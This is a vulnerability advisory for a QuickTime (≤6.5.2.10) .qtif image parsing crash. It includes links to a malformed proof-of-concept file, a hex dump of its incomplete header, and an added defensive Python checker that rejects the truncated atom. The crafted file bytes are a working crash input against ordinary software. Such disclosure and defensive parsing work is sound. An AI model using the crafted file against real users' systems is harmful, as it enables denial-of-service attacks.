
Apple QuickTime <= 6.5.2.10 (.qtif) Image Parsing Vulnerability

🗓️ 01 Jul 2014 00:00:00 | Reported by Root | Type: seebug | 🔗 www.seebug.org

QuickTime Image Parsing Vulnerability <= 6.5.2.10 (.qtif


# Added qtif on milw0rm's sploits archive/ /str0ke #

Application: QuickTime
            http://www.apple.com/quicktime/

AFFECTED VERSION:
Versions verified to be vulnerable:
QuickTime.qts (6.5.2.10) and prior versions are affected.

The bug:
The problem exists when the QuickTime.qts component parses
(.qtif) image files that contain an incomplete header.
A remote user can create a file that, when processed by QuickTime PictureViewer or via a browser,
can cause the remote system to crash.

--Incomplete qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
http://www.exploit-db.com/sploits/vuln.qtif

00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
00000038 0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000 ...Photo - JPEG.............
00000054 0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010           ............rUidat......

VENDOR RESPONSE:
No vendor response.

Discovered by ATmaCA
AtmacaSoft Inc.
http://www.atmacasoft.com

# milw0rm.com [2005-01-24]
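
A pre-parse sanity check for files like the one dumped above, as an added example (not code from the advisory or from Apple): it walks the top-level atoms, assuming the standard QuickTime layout of a 4-byte big-endian size followed by a 4-byte type, and rejects any atom that declares more bytes than the buffer holds. `check_atoms` is a hypothetical name; the input is the 108 bytes printed in the hex dump.

```python
import struct

# The 108 bytes printed in the advisory's hex dump (fromhex ignores spaces).
DUMP = bytes.fromhex(
    "0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000"
    "6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D"
    "0001 0C50 686F 746F 202D 204A 5045 4700 0000 0000 0000 0000 0000 0000"
    "0000 0000 0000 0018 FFFF 0000 7255 6964 6174 FFD8 FFE0 0010"
)


def check_atoms(buf):
    """Walk top-level atoms; return (atoms, problems) without parsing payloads."""
    atoms, problems, off = [], [], 0
    while off < len(buf):
        left = len(buf) - off
        if left < 8:
            problems.append(
                f"offset {off}: {left} trailing bytes, no room for an atom header")
            break
        size, kind = struct.unpack_from(">I4s", buf, off)
        name = kind.decode("latin-1")
        atoms.append((off, name, size))
        if size < 8:
            # 0 (runs to EOF) and 1 (64-bit size follows) are legal QuickTime
            # sizes; this sketch rejects them instead of handling them.
            problems.append(f"{name}@{off}: unsupported or invalid size {size}")
            break
        if size > left:
            problems.append(
                f"{name}@{off}: declares {size} bytes, only {left} present")
            break
        off += size  # size covers the 8-byte header plus the payload
    return atoms, problems


if __name__ == "__main__":
    atoms, problems = check_atoms(DUMP)
    for off, name, size in atoms:
        print(f"{off:#06x} {name} size={size}")
    for p in problems:
        print("REJECT:", p)
```

On the dumped bytes this lists `idsc` (94 bytes) at offset 0 and rejects the `idat` atom at offset 94, which declares 29269 bytes with only 14 present.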

                              

Vulners AI Score: 7.1 (High risk)